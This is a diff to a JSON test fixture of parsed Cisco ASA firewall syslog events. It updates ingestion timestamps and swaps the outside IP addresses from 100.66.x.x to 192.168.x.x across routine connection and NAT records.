@@ -12491,8 +12491,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:25.095026506Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11820 for outside:100.66.3.39/53 (100.66.3.39/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)",
+ "ingested": "2021-12-09T13:32:20.604575300Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11820 for outside:192.168.3.39/53 (192.168.3.39/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)",
 "code": "302015",
 "kind": "event",
 "action": "firewall-rule",
@@ -12508,7 +12508,7 @@
 "destination_interface": "inside",
 "mapped_source_port": 53,
 "mapped_destination_ip": "172.31.98.44",
- "mapped_source_ip": "100.66.3.39",
+ "mapped_source_ip": "192.168.3.39",
 "connection_id": "11820",
 "source_interface": "outside",
 "mapped_destination_port": 56132
@@ -12530,8 +12530,8 @@
 },
 "source": {
 "port": 53,
- "address": "100.66.162.30",
- "ip": "100.66.162.30"
+ "address": "192.168.162.30",
+ "ip": "192.168.162.30"
 },
 "tags": [
 "preserve_original_event"
@@ -12566,7 +12566,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.162.30",
+ "192.168.162.30",
 "172.31.98.44"
 ]
 },
@@ -12575,8 +12575,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:25.095029561Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11821 for outside:100.66.162.30/53 (100.66.162.30/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)",
+ "ingested": "2021-12-09T13:32:20.604580300Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11821 for outside:192.168.162.30/53 (192.168.162.30/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)",
 "code": "302015",
 "kind": "event",
 "action": "firewall-rule",
@@ -12592,7 +12592,7 @@
 "destination_interface": "inside",
 "mapped_source_port": 53,
 "mapped_destination_ip": "172.31.98.44",
- "mapped_source_ip": "100.66.162.30",
+ "mapped_source_ip": "192.168.162.30",
 "connection_id": "11821",
 "source_interface": "outside",
 "mapped_destination_port": 56132
@@ -12614,8 +12614,8 @@
 },
 "source": {
 "port": 53,
- "address": "100.66.3.39",
- "ip": "100.66.3.39"
+ "address": "192.168.3.39",
+ "ip": "192.168.3.39"
 },
 "tags": [
 "preserve_original_event"
@@ -12650,7 +12650,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.3.39",
+ "192.168.3.39",
 "172.31.98.44"
 ]
 },
@@ -12660,8 +12660,8 @@
 "event": {
 "severity": 6,
 "duration": 0,
- "ingested": "2021-07-19T09:06:25.095031597Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11820 for outside:100.66.3.39/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 168",
+ "ingested": "2021-12-09T13:32:20.604583800Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11820 for outside:192.168.3.39/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 168",
 "code": "302016",
 "kind": "event",
 "start": "2018-10-10T12:34:56.000Z",
@@ -12698,8 +12698,8 @@
 },
 "source": {
 "port": 53,
- "address": "100.66.3.39",
- "ip": "100.66.3.39"
+ "address": "192.168.3.39",
+ "ip": "192.168.3.39"
 },
 "tags": [
 "preserve_original_event"
@@ -12734,7 +12734,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.3.39",
+ "192.168.3.39",
 "172.31.98.44"
 ]
 },
@@ -12743,8 +12743,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:25.095033342Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11822 for outside:100.66.3.39/53 (100.66.3.39/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)",
+ "ingested": "2021-12-09T13:32:20.604588Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11822 for outside:192.168.3.39/53 (192.168.3.39/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)",
 "code": "302015",
 "kind": "event",
 "action": "firewall-rule",
@@ -12760,7 +12760,7 @@
 "destination_interface": "inside",
 "mapped_source_port": 53,
 "mapped_destination_ip": "172.31.98.44",
- "mapped_source_ip": "100.66.3.39",
+ "mapped_source_ip": "192.168.3.39",
 "connection_id": "11822",
 "source_interface": "outside",
 "mapped_destination_port": 56132
@@ -12782,8 +12782,8 @@
 },
 "source": {
 "port": 53,
- "address": "100.66.162.30",
- "ip": "100.66.162.30"
+ "address": "192.168.162.30",
+ "ip": "192.168.162.30"
 },
 "tags": [
 "preserve_original_event"
@@ -12818,7 +12818,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.162.30",
+ "192.168.162.30",
 "172.31.98.44"
 ]
 },
@@ -12828,8 +12828,8 @@
 "event": {
 "severity": 6,
 "duration": 0,
- "ingested": "2021-07-19T09:06:25.095035101Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11821 for outside:100.66.162.30/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 198",
+ "ingested": "2021-12-09T13:32:20.604591500Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11821 for outside:192.168.162.30/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 198",
 "code": "302016",
 "kind": "event",
 "start": "2018-10-10T12:34:56.000Z",
@@ -12866,8 +12866,8 @@
 },
 "source": {
 "port": 53,
- "address": "100.66.3.39",
- "ip": "100.66.3.39"
+ "address": "192.168.3.39",
+ "ip": "192.168.3.39"
 },
 "tags": [
 "preserve_original_event"
@@ -12902,7 +12902,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.3.39",
+ "192.168.3.39",
 "172.31.98.44"
 ]
 },
@@ -12912,8 +12912,8 @@
 "event": {
 "severity": 6,
 "duration": 0,
- "ingested": "2021-07-19T09:06:25.095036934Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11822 for outside:100.66.3.39/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 150",
+ "ingested": "2021-12-09T13:32:20.604596200Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11822 for outside:192.168.3.39/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 150",
 "code": "302016",
 "kind": "event",
 "start": "2018-10-10T12:34:56.000Z",
@@ -12950,8 +12950,8 @@
 },
 "source": {
 "port": 53,
- "address": "100.66.48.186",
- "ip": "100.66.48.186"
+ "address": "192.168.48.186",
+ "ip": "192.168.48.186"
 },
 "tags": [
 "preserve_original_event"
@@ -12986,7 +12986,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.48.186",
+ "192.168.48.186",
 "172.31.98.44"
 ]
 },
@@ -12995,8 +12995,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:25.095038656Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11823 for outside:100.66.48.186/53 (100.66.48.186/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)",
+ "ingested": "2021-12-09T13:32:20.604601500Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11823 for outside:192.168.48.186/53 (192.168.48.186/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)",
 "code": "302015",
 "kind": "event",
 "action": "firewall-rule",
@@ -13012,7 +13012,7 @@
 "destination_interface": "inside",
 "mapped_source_port": 53,
 "mapped_destination_ip": "172.31.98.44",
- "mapped_source_ip": "100.66.48.186",
+ "mapped_source_ip": "192.168.48.186",
 "connection_id": "11823",
 "source_interface": "outside",
 "mapped_destination_port": 56132
@@ -13034,8 +13034,8 @@
 },
 "source": {
 "port": 53,
- "address": "100.66.48.186",
- "ip": "100.66.48.186"
+ "address": "192.168.48.186",
+ "ip": "192.168.48.186"
 },
 "tags": [
 "preserve_original_event"
@@ -13070,7 +13070,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.48.186",
+ "192.168.48.186",
 "172.31.98.44"
 ]
 },
@@ -13080,8 +13080,8 @@
 "event": {
 "severity": 6,
 "duration": 0,
- "ingested": "2021-07-19T09:06:25.095040387Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11823 for outside:100.66.48.186/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 84",
+ "ingested": "2021-12-09T13:32:20.604605800Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11823 for outside:192.168.48.186/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 84",
 "code": "302016",
 "kind": "event",
 "start": "2018-10-10T12:34:56.000Z",
@@ -13113,8 +13113,8 @@
 },
 "destination": {
 "port": 8295,
- "address": "100.66.98.44",
- "ip": "100.66.98.44"
+ "address": "192.168.98.44",
+ "ip": "192.168.98.44"
 },
 "source": {
 "port": 1291,
@@ -13154,7 +13154,7 @@
 ],
 "ip": [
 "172.31.98.44",
- "100.66.98.44"
+ "192.168.98.44"
 ]
 },
 "host": {
@@ -13162,8 +13162,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:25.095042162Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1291 to outside:100.66.98.44/8295",
+ "ingested": "2021-12-09T13:32:20.604611100Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1291 to outside:192.168.98.44/8295",
 "code": "305011",
 "kind": "event",
 "action": "firewall-rule",
@@ -13196,8 +13196,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.54.190",
- "ip": "100.66.54.190"
+ "address": "192.168.54.190",
+ "ip": "192.168.54.190"
 },
 "tags": [
 "preserve_original_event"
@@ -13232,7 +13232,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.54.190",
+ "192.168.54.190",
 "172.31.98.44"
 ]
 },
@@ -13241,8 +13241,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:25.095043892Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11824 for outside:100.66.54.190/80 (100.66.54.190/80) to inside:172.31.98.44/1291 (172.31.98.44/1291)",
+ "ingested": "2021-12-09T13:32:20.604616500Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11824 for outside:192.168.54.190/80 (192.168.54.190/80) to inside:172.31.98.44/1291 (172.31.98.44/1291)",
 "code": "302013",
 "kind": "event",
 "action": "firewall-rule",
@@ -13258,7 +13258,7 @@
 "destination_interface": "inside",
 "mapped_source_port": 80,
 "mapped_destination_ip": "172.31.98.44",
- "mapped_source_ip": "100.66.54.190",
+ "mapped_source_ip": "192.168.54.190",
 "connection_id": "11824",
 "source_interface": "outside",
 "mapped_destination_port": 1291
@@ -13280,8 +13280,8 @@
 },
 "source": {
 "port": 53,
- "address": "100.66.254.94",
- "ip": "100.66.254.94"
+ "address": "192.168.254.94",
+ "ip": "192.168.254.94"
 },
 "tags": [
 "preserve_original_event"
@@ -13316,7 +13316,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.254.94",
+ "192.168.254.94",
 "172.31.98.44"
 ]
 },
@@ -13325,8 +13325,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:25.095045842Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11825 for outside:100.66.254.94/53 (100.66.254.94/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)",
+ "ingested": "2021-12-09T13:32:20.604622100Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11825 for outside:192.168.254.94/53 (192.168.254.94/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)",
 "code": "302015",
 "kind": "event",
 "action": "firewall-rule",
@@ -13342,7 +13342,7 @@
 "destination_interface": "inside",
 "mapped_source_port": 53,
 "mapped_destination_ip": "172.31.98.44",
- "mapped_source_ip": "100.66.254.94",
+ "mapped_source_ip": "192.168.254.94",
 "connection_id": "11825",
 "source_interface": "outside",
 "mapped_destination_port": 56132
@@ -13364,8 +13364,8 @@
 },
 "source": {
 "port": 53,
- "address": "100.66.254.94",
- "ip": "100.66.254.94"
+ "address": "192.168.254.94",
+ "ip": "192.168.254.94"
 },
 "tags": [
 "preserve_original_event"
@@ -13400,7 +13400,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.254.94",
+ "192.168.254.94",
 "172.31.98.44"
 ]
 },
@@ -13410,8 +13410,8 @@
 "event": {
 "severity": 6,
 "duration": 0,
- "ingested": "2021-07-19T09:06:25.095047610Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11825 for outside:100.66.254.94/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 188",
+ "ingested": "2021-12-09T13:32:20.604627500Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11825 for outside:192.168.254.94/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 188",
 "code": "302016",
 "kind": "event",
 "start": "2018-10-10T12:34:56.000Z",
@@ -13443,8 +13443,8 @@
 },
 "destination": {
 "port": 8296,
- "address": "100.66.98.44",
- "ip": "100.66.98.44"
+ "address": "192.168.98.44",
+ "ip": "192.168.98.44"
 },
 "source": {
 "port": 1292,
@@ -13484,7 +13484,7 @@
 ],
 "ip": [
 "172.31.98.44",
- "100.66.98.44"
+ "192.168.98.44"
 ]
 },
 "host": {
@@ -13492,8 +13492,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:25.095049324Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1292 to outside:100.66.98.44/8296",
+ "ingested": "2021-12-09T13:32:20.604633100Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1292 to outside:192.168.98.44/8296",
 "code": "305011",
 "kind": "event",
 "action": "firewall-rule",
@@ -13526,8 +13526,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.54.190",
- "ip": "100.66.54.190"
+ "address": "192.168.54.190",
+ "ip": "192.168.54.190"
 },
 "tags": [
 "preserve_original_event"
@@ -13562,7 +13562,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.54.190",
+ "192.168.54.190",
 "172.31.98.44"
 ]
 },
@@ -13571,8 +13571,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:25.095051043Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11826 for outside:100.66.54.190/80 (100.66.54.190/80) to inside:172.31.98.44/1292 (172.31.98.44/1292)",
+ "ingested": "2021-12-09T13:32:20.604638500Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11826 for outside:192.168.54.190/80 (192.168.54.190/80) to inside:172.31.98.44/1292 (172.31.98.44/1292)",
 "code": "302013",
 "kind": "event",
 "action": "firewall-rule",
@@ -13588,7 +13588,7 @@
 "destination_interface": "inside",
 "mapped_source_port": 80,
 "mapped_destination_ip": "172.31.98.44",
- "mapped_source_ip": "100.66.54.190",
+ "mapped_source_ip": "192.168.54.190",
 "connection_id": "11826",
 "source_interface": "outside",
 "mapped_destination_port": 1292
@@ -13605,8 +13605,8 @@
 },
 "destination": {
 "port": 8297,
- "address": "100.66.98.44",
- "ip": "100.66.98.44"
+ "address": "192.168.98.44",
+ "ip": "192.168.98.44"
 },
 "source": {
 "port": 1293,
@@ -13646,7 +13646,7 @@
 ],
 "ip": [
 "172.31.98.44",
- "100.66.98.44"
+ "192.168.98.44"
 ]
 },
 "host": {
@@ -13654,8 +13654,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:25.095052816Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1293 to outside:100.66.98.44/8297",
+ "ingested": "2021-12-09T13:32:20.604643800Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1293 to outside:192.168.98.44/8297",
 "code": "305011",
 "kind": "event",
 "action": "firewall-rule",
@@ -13688,8 +13688,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.98.165",
- "ip": "100.66.98.165"
+ "address": "192.168.98.165",
+ "ip": "192.168.98.165"
 },
 "tags": [
 "preserve_original_event"
@@ -13724,7 +13724,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.98.165",
+ "192.168.98.165",
 "172.31.98.44"
 ]
 },
@@ -13733,8 +13733,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:25.095054588Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11827 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1293 (172.31.98.44/1293)",
+ "ingested": "2021-12-09T13:32:20.604649200Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11827 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1293 (172.31.98.44/1293)",
 "code": "302013",
 "kind": "event",
 "action": "firewall-rule",
@@ -13750,7 +13750,7 @@
 "destination_interface": "inside",
 "mapped_source_port": 80,
 "mapped_destination_ip": "172.31.98.44",
- "mapped_source_ip": "100.66.98.165",
+ "mapped_source_ip": "192.168.98.165",
 "connection_id": "11827",
 "source_interface": "outside",
 "mapped_destination_port": 1293
@@ -13767,8 +13767,8 @@
 },
 "destination": {
 "port": 8298,
- "address": "100.66.98.44",
- "ip": "100.66.98.44"
+ "address": "192.168.98.44",
+ "ip": "192.168.98.44"
 },
 "source": {
 "port": 1294,
@@ -13808,7 +13808,7 @@
 ],
 "ip": [
 "172.31.98.44",
- "100.66.98.44"
+ "192.168.98.44"
 ]
 },
 "host": {
@@ -13816,8 +13816,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:25.095056325Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1294 to outside:100.66.98.44/8298",
+ "ingested": "2021-12-09T13:32:20.604654600Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1294 to outside:192.168.98.44/8298",
 "code": "305011",
 "kind": "event",
 "action": "firewall-rule",
@@ -13850,8 +13850,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.98.165",
- "ip": "100.66.98.165"
+ "address": "192.168.98.165",
+ "ip": "192.168.98.165"
 },
 "tags": [
 "preserve_original_event"
@@ -13886,7 +13886,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.98.165",
+ "192.168.98.165",
 "172.31.98.44"
 ]
 },
@@ -13895,8 +13895,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:25.095058049Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11828 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1294 (172.31.98.44/1294)",
+ "ingested": "2021-12-09T13:32:20.604659900Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11828 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1294 (172.31.98.44/1294)",
 "code": "302013",
 "kind": "event",
 "action": "firewall-rule",
@@ -13912,7 +13912,7 @@
 "destination_interface": "inside",
 "mapped_source_port": 80,
 "mapped_destination_ip": "172.31.98.44",
- "mapped_source_ip": "100.66.98.165",
+ "mapped_source_ip": "192.168.98.165",
 "connection_id": "11828",
 "source_interface": "outside",
 "mapped_destination_port": 1294
@@ -13934,8 +13934,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.98.165",
- "ip": "100.66.98.165"
+ "address": "192.168.98.165",
+ "ip": "192.168.98.165"
 },
 "tags": [
 "preserve_original_event"
@@ -13970,7 +13970,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.98.165",
+ "192.168.98.165",
 "172.31.98.44"
 ]
 },
@@ -13981,8 +13981,8 @@
 "severity": 6,
 "duration": 0,
 "reason": "TCP FINs",
- "ingested": "2021-07-19T09:06:25.095059822Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11827 for outside:100.66.98.165/80 to inside:172.31.98.44/1293 duration 0:00:00 bytes 5964 TCP FINs",
+ "ingested": "2021-12-09T13:32:20.604665300Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11827 for outside:192.168.98.165/80 to inside:172.31.98.44/1293 duration 0:00:00 bytes 5964 TCP FINs",
 "code": "302014",
 "kind": "event",
 "start": "2018-10-10T12:34:56.000Z",
@@ -14014,8 +14014,8 @@
 },
 "destination": {
 "port": 8299,
- "address": "100.66.98.44",
- "ip": "100.66.98.44"
+ "address": "192.168.98.44",
+ "ip": "192.168.98.44"
 },
 "source": {
 "port": 1295,
@@ -14055,7 +14055,7 @@
 ],
 "ip": [
 "172.31.98.44",
- "100.66.98.44"
+ "192.168.98.44"
 ]
 },
 "host": {
@@ -14063,8 +14063,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:25.095061585Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1295 to outside:100.66.98.44/8299",
+ "ingested": "2021-12-09T13:32:20.604670700Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1295 to outside:192.168.98.44/8299",
 "code": "305011",
 "kind": "event",
 "action": "firewall-rule",
@@ -14097,8 +14097,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.98.165",
- "ip": "100.66.98.165"
+ "address": "192.168.98.165",
+ "ip": "192.168.98.165"
 },
 "tags": [
 "preserve_original_event"
@@ -14133,7 +14133,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.98.165",
+ "192.168.98.165",
 "172.31.98.44"
 ]
 },
@@ -14142,8 +14142,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:25.095063345Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11829 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1295 (172.31.98.44/1295)",
+ "ingested": "2021-12-09T13:32:20.604676200Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11829 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1295 (172.31.98.44/1295)",
 "code": "302013",
 "kind": "event",
 "action": "firewall-rule",
@@ -14159,7 +14159,7 @@
 "destination_interface": "inside",
 "mapped_source_port": 80,
 "mapped_destination_ip": "172.31.98.44",
- "mapped_source_ip": "100.66.98.165",
+ "mapped_source_ip": "192.168.98.165",
 "connection_id": "11829",
 "source_interface": "outside",
 "mapped_destination_port": 1295
@@ -14176,8 +14176,8 @@
 },
 "destination": {
 "port": 8300,
- "address": "100.66.98.44",
- "ip": "100.66.98.44"
+ "address": "192.168.98.44",
+ "ip": "192.168.98.44"
 },
 "source": {
 "port": 1296,
@@ -14217,7 +14217,7 @@
 ],
 "ip": [
 "172.31.98.44",
- "100.66.98.44"
+ "192.168.98.44"
 ]
 },
 "host": {
@@ -14225,8 +14225,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:25.095065149Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1296 to outside:100.66.98.44/8300",
+ "ingested": "2021-12-09T13:32:20.604681600Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1296 to outside:192.168.98.44/8300",
 "code": "305011",
 "kind": "event",
 "action": "firewall-rule",
@@ -14259,8 +14259,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.98.165",
- "ip": "100.66.98.165"
+ "address": "192.168.98.165",
+ "ip": "192.168.98.165"
 },
 "tags": [
 "preserve_original_event"
@@ -14295,7 +14295,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.98.165",
+ "192.168.98.165",
 "172.31.98.44"
 ]
 },
@@ -14304,8 +14304,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:25.095066875Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11830 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1296 (172.31.98.44/1296)",
+ "ingested": "2021-12-09T13:32:20.604687100Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11830 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1296 (172.31.98.44/1296)",
 "code": "302013",
 "kind": "event",
 "action": "firewall-rule",
@@ -14321,7 +14321,7 @@
 "destination_interface": "inside",
 "mapped_source_port": 80,
 "mapped_destination_ip": "172.31.98.44",
- "mapped_source_ip": "100.66.98.165",
+ "mapped_source_ip": "192.168.98.165",
 "connection_id": "11830",
 "source_interface": "outside",
 "mapped_destination_port": 1296
@@ -14343,8 +14343,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.98.165",
- "ip": "100.66.98.165"
+ "address": "192.168.98.165",
+ "ip": "192.168.98.165"
 },
 "tags": [
 "preserve_original_event"
@@ -14379,7 +14379,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.98.165",
+ "192.168.98.165",
 "172.31.98.44"
 ]
 },
@@ -14390,8 +14390,8 @@
 "severity": 6,
 "duration": 0,
 "reason": "TCP FINs",
- "ingested": "2021-07-19T09:06:25.095068592Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11828 for outside:100.66.98.165/80 to inside:172.31.98.44/1294 duration 0:00:00 bytes 6694 TCP FINs",
+ "ingested": "2021-12-09T13:32:20.604690900Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11828 for outside:192.168.98.165/80 to inside:172.31.98.44/1294 duration 0:00:00 bytes 6694 TCP FINs",
 "code": "302014",
 "kind": "event",
 "start": "2018-10-10T12:34:56.000Z",
@@ -14428,8 +14428,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.98.165",
- "ip": "100.66.98.165"
+ "address": "192.168.98.165",
+ "ip": "192.168.98.165"
 },
 "tags": [
 "preserve_original_event"
@@ -14464,7 +14464,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.98.165",
+ "192.168.98.165",
 "172.31.98.44"
 ]
 },
@@ -14475,8 +14475,8 @@
 "severity": 6,
 "duration": 0,
 "reason": "TCP FINs",
- "ingested": "2021-07-19T09:06:25.095070333Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11829 for outside:100.66.98.165/80 to inside:172.31.98.44/1295 duration 0:00:00 bytes 1493 TCP FINs",
+ "ingested": "2021-12-09T13:32:20.604695200Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11829 for outside:192.168.98.165/80 to inside:172.31.98.44/1295 duration 0:00:00 bytes 1493 TCP FINs",
 "code": "302014",
 "kind": "event",
 "start": "2018-10-10T12:34:56.000Z",
@@ -14513,8 +14513,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.98.165",
- "ip": "100.66.98.165"
+ "address": "192.168.98.165",
+ "ip": "192.168.98.165"
 },
 "tags": [
 "preserve_original_event"
@@ -14549,7 +14549,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.98.165",
+ "192.168.98.165",
 "172.31.98.44"
 ]
 },
@@ -14560,8 +14560,8 @@
 "severity": 6,
 "duration": 0,
 "reason": "TCP FINs",
- "ingested": "2021-07-19T09:06:25.095072079Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11830 for outside:100.66.98.165/80 to inside:172.31.98.44/1296 duration 0:00:00 bytes 893 TCP FINs",
